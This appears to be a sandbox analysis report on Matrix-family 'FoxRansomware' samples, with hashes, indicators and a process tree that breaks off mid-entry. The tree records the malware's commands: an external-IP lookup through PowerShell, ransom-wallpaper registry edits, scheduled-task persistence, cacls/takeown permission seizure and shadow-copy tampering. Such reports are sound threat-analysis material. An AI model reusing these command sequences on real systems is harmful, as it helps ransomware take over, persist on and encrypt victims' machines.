Analysis
max time kernel: 184s
max time network: 132s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 13-02-2024 05:15
Static task: static1
Behavioral task behavioral1: sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, resource win7-20231215-en
Behavioral task behavioral2: sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, resource win10v2004-20231215-en
Behavioral task behavioral3: sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, resource win7-20231215-en
Behavioral task behavioral4: sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, resource win10v2004-20231215-en
Behavioral task behavioral5: sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, resource win7-20231215-en
Behavioral task behavioral6: sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, resource win10v2004-20231215-en
Behavioral task behavioral7: sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, resource win7-20231215-en
Behavioral task behavioral8: sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, resource win10v2004-20231215-en
Behavioral task behavioral9: sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, resource win7-20231215-en
Behavioral task behavioral10: sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, resource win10v2004-20231222-en
Behavioral task behavioral11: sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, resource win7-20231215-en
Behavioral task behavioral12: sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, resource win10v2004-20231215-en
General
Target: FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Size: 1.2MB
MD5: 268360527625d09e747d9f7ab1f84da5
SHA1: 09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA256: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA512: 07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
SSDEEP: 24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted: http://myexternalip.com/raw
Extracted from C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf:
  https://bitmsg.me
  https://bitmsg.me/users/sign_up
  https://bitmsg.me/users/sign_in
Signatures
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Blocklisted process makes network request 1 IoCs
flow 10, pid 2872, process powershell.exe
Drops file in Drivers directory 1 IoCs
File created: C:\Windows\system32\Drivers\PROCEXP152.SYS (process uSDT8H9y64.exe)
Sets service image path in registry 2 TTPs 1 IoCs
Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (process uSDT8H9y64.exe)
Executes dropped EXE 59 IoCs
pid Process 2580 NWgTwPHO.exe 3280 uSDT8H9y.exe 3308 uSDT8H9y64.exe 3068 uSDT8H9y.exe 3224 uSDT8H9y.exe 3324 uSDT8H9y.exe 2832 uSDT8H9y.exe 3776 uSDT8H9y.exe 3808 uSDT8H9y.exe 2884 uSDT8H9y.exe 1356 uSDT8H9y.exe 3936 uSDT8H9y.exe 3912 uSDT8H9y.exe 3136 uSDT8H9y.exe 3124 uSDT8H9y.exe 1356 uSDT8H9y.exe 1408 uSDT8H9y.exe 2528 uSDT8H9y.exe 2952 uSDT8H9y.exe 3800 uSDT8H9y.exe 2740 uSDT8H9y.exe 1680 uSDT8H9y.exe 2680 uSDT8H9y.exe 2856 uSDT8H9y.exe 3140 uSDT8H9y.exe 3220 uSDT8H9y.exe 2152 uSDT8H9y.exe 3036 uSDT8H9y.exe 3452 uSDT8H9y.exe 3376 uSDT8H9y.exe 3664 uSDT8H9y.exe 3416 uSDT8H9y.exe 1212 uSDT8H9y.exe 2912 uSDT8H9y.exe 3644 uSDT8H9y.exe 4028 uSDT8H9y.exe 3184 uSDT8H9y.exe 1756 uSDT8H9y.exe 1560 uSDT8H9y.exe 3448 uSDT8H9y.exe 3648 uSDT8H9y.exe 3048 uSDT8H9y.exe 2640 uSDT8H9y.exe 2428 uSDT8H9y.exe 664 uSDT8H9y.exe 1708 uSDT8H9y.exe 1732 uSDT8H9y.exe 3616 uSDT8H9y.exe 2688 uSDT8H9y.exe 596 uSDT8H9y.exe 2260 uSDT8H9y.exe 3684 uSDT8H9y.exe 576 uSDT8H9y.exe 1048 uSDT8H9y.exe 3412 uSDT8H9y.exe 1568 uSDT8H9y.exe 4032 uSDT8H9y.exe 1948 uSDT8H9y.exe 2788 uSDT8H9y.exe -
Loads dropped DLL 60 IoCs
pid Process 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 2360 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 1072 cmd.exe 3280 uSDT8H9y.exe 3092 cmd.exe 3956 cmd.exe 3300 cmd.exe 2028 cmd.exe 3768 cmd.exe 1728 cmd.exe 2088 cmd.exe 1872 cmd.exe 3940 cmd.exe 2168 cmd.exe 3104 cmd.exe 3872 cmd.exe 3000 cmd.exe 3080 cmd.exe 2188 cmd.exe 3484 cmd.exe 3776 cmd.exe 3520 cmd.exe 328 cmd.exe 2424 cmd.exe 756 cmd.exe 544 cmd.exe 3064 cmd.exe 3872 cmd.exe 1608 cmd.exe 3272 cmd.exe 3592 cmd.exe 868 cmd.exe 2244 cmd.exe 1592 cmd.exe 2764 cmd.exe 3692 cmd.exe 2740 cmd.exe 268 cmd.exe 616 cmd.exe 3164 cmd.exe 2964 cmd.exe 3568 cmd.exe 2888 cmd.exe 952 cmd.exe 2624 cmd.exe 548 cmd.exe 3832 cmd.exe 3432 cmd.exe 3724 cmd.exe 2788 cmd.exe 1208 cmd.exe 4020 cmd.exe 876 cmd.exe 3604 cmd.exe 2972 cmd.exe 2452 cmd.exe 3184 cmd.exe 2068 cmd.exe 300 cmd.exe 2060 cmd.exe -
Modifies file permissions 1 TTPs 29 IoCs
pid Process 1624 takeown.exe 616 takeown.exe 2984 takeown.exe 344 takeown.exe 3288 takeown.exe 3152 takeown.exe 3996 takeown.exe 748 takeown.exe 548 takeown.exe 1560 takeown.exe 2088 takeown.exe 2068 takeown.exe 1704 takeown.exe 3760 takeown.exe 3212 takeown.exe 1692 takeown.exe 3212 takeown.exe 1940 takeown.exe 3244 takeown.exe 616 takeown.exe 3728 takeown.exe 2388 takeown.exe 3780 takeown.exe 1568 takeown.exe 2372 takeown.exe 3672 takeown.exe 748 takeown.exe 3560 takeown.exe 3616 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Drops desktop.ini file(s) 40 IoCs
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 9, ioc myexternalip.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Set value (str): \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\VjQ8qyxz.bmp" (process reg.exe)
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1624 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3992 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
- PID 2872 powershell.exe
- PID 3308 uSDT8H9y64.exe
- PID 3308 uSDT8H9y64.exe
- PID 3308 uSDT8H9y64.exe
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3308 uSDT8H9y64.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
- Token: SeDebugPrivilege, PID 2872, powershell.exe
- Token: SeDebugPrivilege, PID 3308, uSDT8H9y64.exe
- Token: SeLoadDriverPrivilege, PID 3308, uSDT8H9y64.exe
- Token: SeTakeOwnershipPrivilege, PID 2068, takeown.exe
- Token: SeTakeOwnershipPrivilege, PID 3780, takeown.exe
- Token: SeBackupPrivilege, PID 1604, vssvc.exe
- Token: SeRestorePrivilege, PID 1604, vssvc.exe
- Token: SeAuditPrivilege, PID 1604, vssvc.exe
- Token: SeTakeOwnershipPrivilege, PID 616, takeown.exe
- Token: SeTakeOwnershipPrivilege, PID 2984, takeown.exe
- Token: SeTakeOwnershipPrivilege, PID 548, takeown.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
Process tree (indented by depth; each entry lists the image path, the command line, the behaviour tags and the PID):

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"
  - Matrix Ransomware
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:2360

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe"
    PID:2696

  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe" -n
    - Executes dropped EXE
    PID:2580

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\VsXhzO5K.txt"
    - Suspicious use of WriteProcessMemory
    PID:2028
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:2872

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    - Suspicious use of WriteProcessMemory
    PID:1740
    C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f
      - Sets desktop wallpaper using registry
      PID:3000
    C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
      PID:2640
    C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      PID:2884

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"
    - Suspicious use of WriteProcessMemory
    PID:1980
    C:\Windows\SysWOW64\wscript.exe
      wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"
      - Suspicious use of WriteProcessMemory
      PID:2508
      C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F
        - Suspicious use of WriteProcessMemory
        PID:2888
        C:\Windows\SysWOW64\schtasks.exe
          schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F
          - Creates scheduled task(s)
          PID:1624
      C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
        PID:4024
        C:\Windows\SysWOW64\schtasks.exe
          schtasks /Run /I /tn DSHCA
          PID:652

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
    - Suspicious use of WriteProcessMemory
    PID:2004
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
      PID:2744
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
      - Modifies file permissions
      PID:748
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner
      - Loads dropped DLL
      PID:1072
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner
        - Executes dropped EXE
        - Loads dropped DLL
        PID:3280
        C:\Users\Admin\AppData\Local\Temp\uSDT8H9y64.exe
          uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner
          - Drops file in Drivers directory
          - Sets service image path in registry
          - Executes dropped EXE
          - Enumerates connected drives
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: LoadsDriver
          - Suspicious use of AdjustPrivilegeToken
          PID:3308

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
    - Loads dropped DLL
    PID:3956
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
      PID:3132
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
      - Modifies file permissions
      PID:3152
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner
      - Loads dropped DLL
      PID:3092
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner
        - Executes dropped EXE
        PID:3068
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:3224

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
    - Loads dropped DLL
    PID:2028
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
      PID:1932
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
      - Modifies file permissions
      PID:1940
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner
      - Loads dropped DLL
      PID:3300
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner
        - Executes dropped EXE
        PID:3324
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:2832

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
    - Loads dropped DLL
    PID:1728
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
      PID:3680
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
      - Modifies file permissions
      PID:3760
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner
      - Loads dropped DLL
      PID:3768
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner
        - Executes dropped EXE
        PID:3776
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:3808

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
    - Loads dropped DLL
    PID:1872
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
      PID:1060
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
      - Modifies file permissions
      PID:1560
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      - Loads dropped DLL
      PID:2088
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
        - Executes dropped EXE
        PID:2884
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:1356

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
    - Loads dropped DLL
    PID:2168
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
      PID:3984
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
      - Modifies file permissions
      PID:3996
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner
      - Loads dropped DLL
      PID:3940
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner
        - Executes dropped EXE
        PID:3936
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:3912

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
    - Loads dropped DLL
    PID:3872
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
      PID:3140
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
      - Modifies file permissions
      PID:3212
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner
      - Loads dropped DLL
      PID:3104
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner
        - Executes dropped EXE
        PID:3136
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:3124

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
    - Loads dropped DLL
    PID:3080
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
      PID:1744
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
      - Modifies file permissions
      PID:2088
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "classes.jsa" -nobanner
      - Loads dropped DLL
      PID:3000
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "classes.jsa" -nobanner
        - Executes dropped EXE
        PID:1356
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:1408

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
    - Loads dropped DLL
    PID:3484
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
      PID:1512
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
      PID:2068
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner
      - Loads dropped DLL
      PID:2188
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner
        - Executes dropped EXE
        PID:2528
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:2952

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
    - Loads dropped DLL
    PID:3520
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
      PID:3684
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
      PID:3780
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner
      - Loads dropped DLL
      PID:3776
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner
        - Executes dropped EXE
        PID:3800
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:2740

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
    - Loads dropped DLL
    PID:2424
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
      PID:1496
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
      - Modifies file permissions
      PID:1704
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "eula.ini" -nobanner
      - Loads dropped DLL
      PID:328
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "eula.ini" -nobanner
        - Executes dropped EXE
        PID:1680
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:2680

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
    - Loads dropped DLL
    PID:544
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
      PID:4060
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
      - Modifies file permissions
      PID:1692
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner
      - Loads dropped DLL
      PID:756
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner
        - Executes dropped EXE
        PID:2856
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:3140

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
    - Loads dropped DLL
    PID:3872
    C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
      PID:3176
    C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
      - Modifies file permissions
      PID:1568
    C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner
      - Loads dropped DLL
      PID:3064
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
        uSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner
        - Executes dropped EXE
        PID:3220
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
      PID:2152

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
    - Loads dropped DLL
    PID:3272
    C:\Windows\SysWOW64\cacls.exe
